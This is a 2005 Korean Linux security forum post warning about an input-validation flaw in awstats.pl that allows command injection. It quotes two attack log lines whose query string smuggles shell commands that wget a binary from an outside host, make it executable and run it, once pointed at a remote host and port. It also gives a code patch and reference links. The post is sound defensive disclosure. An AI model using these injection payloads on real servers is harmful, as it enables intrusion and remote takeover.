리눅스

웹해킹 공격 시도입니다.

홍석범 작성
작성일 2005.06.13 15:51

2,380 조회
0 추천
목록

안녕하십니까?
리눅스서버보안관리실무(http://superuser.co.kr/linuxsecurityadmin/) 저자 홍석범입니다.

최근 들어 제로보드등 웹응용프로그램의 취약성을 이용한 소위 "웹해킹"이

자주 발견되고 있습니다. 굳이 시스템의 로그인 권한 없이도 웹을 통해

손쉽게 웹서버의 실행권한을 획득할 수 있고 로그도 잘 남지 않는다는 점 때문에

앞으로 해킹/보안의 주된 이슈중의 하나가 되지 않을까 합니다.

최근에는 웹로그 분석 프로그램으로 많이 사용되고 있는 awstats 일부 버전에서

역시 다른 프로그램과 마찬가지로, 입력되는 변수의 유효성(input validation)을 체크하지

않는 취약성으로 인하여 웹을 통해 쉽게 cgi의 실행권한을 획득할 수 있는 방법이 공개된 후 실행코드도 공개가 된 상태입니다.

아래는 실제로 공격이 이루어진 로그중 일부입니다.

200.96. xx.xxx - - [26/Jan/2005:06:32:00 +0000] "GET /cgi-bin/awstats/awstats.pl?xxxx=%20/tmp;

wget%20http://www.nokiacxxxx.cz/dcha0s/cgi;ls%20-la%20cgi;chmod%20777%20cgi;./cgi;%00

HTTP/1.1" 200 538 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

200.96.xx.xxx - - [26/Jan/2005:06:34:30 +0000] "GET /cgi-bin/awstats/awstats.pl?xxx=%20/tmp;wget%20http://www.nokiacxxxx.cz/dcha0s/dc;chmod%20777%20dc;./dc%20cyber.yar.ru%208080;%00

HTTP/1.1" 200 554 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

따라서 최근에 업데이트된 버전을 사용하지 않는 경우 업데이터를 하거나

다음과 같이 awstats.pl 파일의 코드를 수정하셔야 합니다.

변경전)

if ($QueryString =~ /configdir=([^&]+)/i)
    {
        $DirConfig=&DecodeEncodedString("$1");
    }

변경후)

    if ($QueryString =~ /configdir=([^&]+)/i)
    {
        $DirConfig=&DecodeEncodedString("$1");
      $DirConfig=~tr/a-z0-9_-/./a-z0-9_-/./cd;    //추가
    }

본 취약성과 관련해서는 아래의 URL을 참고하시기 바랍니다.

http://awstats.sourceforge.net/

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0116

아울러 최근의 웹 응용 프로그램을 이용한 해킹 기법과 대책에 대하여

자세하게 설명된 자료가 있으니 참고하시기 바랍니다.

php 웹게시판 관련 침해사고 분석 및 대책

http://www.certcc.or.kr/report/download.jsp?no=IN2005001&seq=3

어플리케이션 공격 기법분석

http://www.securitymap.net/sdm/docs/attack/Application-Attack-Analysis-PHP.pdf

그리고, 일부 응용 프로그램에서 /var/tmp를 사용할 수 있으므로 에러는 없는지 확인해 보시기 바랍니다. 아울러 공격자는 /var/tmp이외 /tmp와 /dev/shm을 주로 사용합니다.

감사합니다.